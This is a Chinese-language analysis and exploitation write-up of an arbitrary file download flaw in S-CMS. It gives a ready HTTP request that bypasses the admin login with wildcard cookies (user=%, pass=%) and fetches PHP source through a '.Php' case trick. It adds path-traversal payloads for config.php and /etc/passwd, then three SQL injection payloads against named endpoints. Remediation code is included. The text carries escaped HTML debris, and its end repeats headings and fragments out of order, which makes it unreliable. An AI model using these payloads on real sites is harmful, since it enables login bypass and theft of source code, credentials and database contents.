S-CMS 任意文件下载漏洞分析与利用<\/h1>

漏洞概述<\/h2>

S-CMS 存在一个任意文件下载漏洞，攻击者可以通过构造特殊的请求绕过身份验证并下载服务器上的任意文件（包括PHP源码文件）。该漏洞主要涉及两个关键点：<\/p>

使用 LIKE 操作符进行身份验证时的绕过<\/li>

文件后缀名检查的绕过<\/li> <\/ol>

漏洞分析<\/h2>

1. 漏洞文件位置<\/h3>
漏洞存在于 `admin\/download.php<\/code> 文件中，该文件用于处理文件下载请求。<\/p>`

2. 关键代码分析<\/h3>
身份验证部分<\/h4>
if<\/span>($_COOKIE["user"<\/span>]==<\/span>""<\/span> ||<\/span> $_COOKIE["pass"<\/span>]==<\/span>""<\/span>){
<\/span><\/span>    \/\/ 清除cookie并重定向
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    $sql=<\/span>"select * from SL_admin where A_login like '"<\/span>.<\/span>filter_keyword<\/span>($_COOKIE["user"<\/span>]).<\/span>"' and A_pwd like '"<\/span>.<\/span>filter_keyword<\/span>($_COOKIE["pass"<\/span>]).<\/span>"'"<\/span>;
<\/span><\/span>    $result=<\/span>mysqli_query<\/span>($conn,$sql);
<\/span><\/span>    $row=<\/span>mysqli_fetch_assoc<\/span>($result);
<\/span><\/span>    if<\/span>(mysqli_num_rows<\/span>($result)><\/span>0<\/span>){
<\/span><\/span>        \/\/ 验证通过
<\/span><\/span><\/span><\/span>    } else<\/span> {
<\/span><\/span>        \/\/ 清除cookie并重定向
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

使用 LIKE 操作符而非等号(=)进行身份验证<\/li>
虽然使用了 filter_keyword<\/code> 函数过滤输入，但可以使用通配符绕过<\/li>
<\/ul>
文件下载部分<\/h4>
$DownName=<\/span>$_GET["DownName"<\/span>];
<\/span><\/span>if<\/span>(strpos<\/span>($DownName,".php"<\/span>)!==<\/span>false<\/span>){
<\/span><\/span>    die<\/span>("禁止下载PHP格式文件!"<\/span>);
<\/span><\/span>}
<\/span><\/span>downtemplateAction<\/span>($DownName);
<\/span><\/span><\/code><\/pre>漏洞点<\/strong>：<\/p>

仅检查小写的 ".php" 后缀<\/li>
未对文件路径进行限制，可目录穿越<\/li>
<\/ul>
3. 漏洞利用原理<\/h3>


身份验证绕过<\/strong>：<\/p>

设置 cookie user=%<\/code> 和 pass=%<\/code><\/li>
SQL 语句变为：... where A_login like '%' and A_pwd like '%'<\/code><\/li>
这将匹配数据库中的任何记录，绕过身份验证<\/li>
<\/ul>
<\/li>

文件后缀名绕过<\/strong>：<\/p>

使用大小写混淆，如 ".Php" 代替 ".php"<\/li>
绕过 strpos<\/code> 检查<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
1. 基本利用方式<\/h3>
构造如下HTTP请求：<\/p>
GET \/3.gov.php\/admin\/download.php?DownName=download.Php HTTP\/1.1
Host: localhost
User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko\/20100101 Firefox\/56.0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: user=%;pass=%;
Connection: close
Upgrade-Insecure-Requests: 1
<\/code><\/pre>
2. 利用扩展<\/h3>


下载任意文件<\/strong>：<\/p>

修改 DownName<\/code> 参数为其他文件路径<\/li>
例如：DownName=..\/..\/config.php<\/code> 下载配置文件<\/li>
<\/ul>
<\/li>

目录穿越<\/strong>：<\/p>

使用 ..\/<\/code> 遍历目录<\/li>
例如：DownName=..\/..\/..\/etc\/passwd<\/code><\/li>
<\/ul>
<\/li>

其他后缀名绕过<\/strong>：<\/p>

尝试不同的大小写组合：.pHp<\/code>, .pHP<\/code> 等<\/li>
尝试空字节截断（取决于PHP版本）<\/li>
<\/ul>
<\/li>
<\/ol>
修复建议<\/h2>


身份验证修复<\/strong>：<\/p>

使用等号(=)而非 LIKE 进行身份验证<\/li>
添加更强的输入过滤<\/li>
<\/ul>
<\/li>

文件下载修复<\/strong>：<\/p>

使用白名单限制可下载文件类型<\/li>
规范化文件路径，防止目录穿越<\/li>
使用更严格的文件后缀检查（如正则表达式，不区分大小写）<\/li>
<\/ul>
<\/li>

代码示例修复<\/strong>：<\/p>
<\/li>
<\/ol>
\/\/ 修复后的身份验证
<\/span><\/span><\/span><\/span>$sql =<\/span> "select * from SL_admin where A_login = '"<\/span>.<\/span>mysqli_real_escape_string<\/span>($conn, $_COOKIE["user"<\/span>]).<\/span>"' and A_pwd = '"<\/span>.<\/span>mysqli_real_escape_string<\/span>($conn, $_COOKIE["pass"<\/span>]).<\/span>"'"<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 修复后的文件下载检查
<\/span><\/span><\/span><\/span>$allowed_ext =<\/span> ['pdf'<\/span>, 'doc'<\/span>, 'docx'<\/span>]; \/\/ 白名单
<\/span><\/span><\/span><\/span>$ext =<\/span> strtolower<\/span>(pathinfo<\/span>($DownName, PATHINFO_EXTENSION<\/span>));
<\/span><\/span>if<\/span>(!<\/span>in_array<\/span>($ext, $allowed_ext) ||<\/span> strpos<\/span>($DownName, '..\/'<\/span>) !==<\/span> false<\/span>){
<\/span><\/span>    die<\/span>("非法文件类型或路径!"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>其他相关漏洞<\/h2>
根据文章，S-CMS 还存在多处SQL注入漏洞：<\/p>


示例1：<\/p>
http:\/\/127.0.0.1\/3.gov.php\/wap_index.php?type=newsinfo&S_id=112489097%20or%20ascii(substr(user(),1,1))=114
<\/code><\/pre>
<\/li>

示例2：<\/p>
http:\/\/127.0.0.1\/3.gov.php\/js\/pic.php?P_id=10440322488%20or%20ascii(substr(user(),1,1))=113
<\/code><\/pre>
<\/li>

示例3（POST注入）：<\/p>
POST \/3.gov.php\/js\/scms.php?action=comment HTTP\/1.1
...
page=aaaaa11' or if(substr(user(),1,1)='r',sleep(5),1) --+
<\/code><\/pre>
<\/li>
<\/ol>
这些漏洞表明S-CMS在输入过滤和SQL查询构建方面存在系统性安全问题。<\/p>

S-CMS 任意文件下载漏洞分析与利用<\/h1>

漏洞分析<\/h2>

1. 漏洞文件位置<\/h3> 漏洞存在于 admin\/download.php<\/code> 文件中，该文件用于处理文件下载请求。<\/p>

漏洞利用<\/h2>

1. 漏洞文件位置<\/h3>
漏洞存在于 `admin\/download.php<\/code> 文件中，该文件用于处理文件下载请求。<\/p>`